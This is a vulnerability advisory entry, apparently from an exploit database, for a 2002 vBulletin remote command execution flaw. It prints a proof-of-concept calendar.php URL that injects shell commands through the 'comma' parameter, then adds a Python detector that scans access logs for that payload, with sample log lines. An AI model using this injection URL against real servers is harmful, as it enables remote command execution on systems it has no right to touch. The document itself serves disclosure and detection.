Vendor: vBulletin
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote Command Execution
CWE: 78
Product Name: vBulletin
Affected Version From: vBulletin
Affected Version To: vBulletin
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

vBulletin Remote Command Execution Vulnerability

A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system by crafting a malicious URL.

Mitigation:

Input validation should be applied to user-supplied input from URI parameters so that it is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5820/info

A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. 

An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.

http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

where <command> signifies a command to be executed on the system.
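
The following is an added detection example, not part of the original advisory or of vBulletin: it scans web server access-log lines for requests to calendar.php whose decoded query parameters contain the quote, backtick, semicolon or parenthesis characters seen in the URL above. The combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters seen in the request shown above that have no place in a
# calendar.php parameter value: double quote, backtick, semicolon, parentheses.
SUSPICIOUS = re.compile(r'["`;()]')
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_calendar_requests(log_lines):
    """Return (line_number, parameter, decoded_value) for suspicious hits."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/calendar.php"):
            continue
        # parse_qs percent-decodes each value before we inspect it
        params = parse_qs(target.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if SUSPICIOUS.search(value):
                    hits.append((number, name, value))
    return hits

# Constructed sample log lines (assumed format, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2002:10:00:00 +0000] '
    '"GET /calendar.php?action=getday&day=2001-8-15 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Oct/2002:10:02:11 +0000] '
    '"GET /calendar.php?calbirthdays=1&action=getday&day=2001-8-15'
    '&comma=%22;echo%20%27%27;%20echo%20%60%3Ccommand%3E%20%60;die();echo%22'
    ' HTTP/1.0" 200 312',
    '192.0.2.10 - - [01/Oct/2002:10:03:40 +0000] '
    '"GET /index.php?s=a;b HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for number, name, value in flag_calendar_requests(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r}")
```

Only the second sample line is reported; the ordinary calendar request and the request to a different script are ignored.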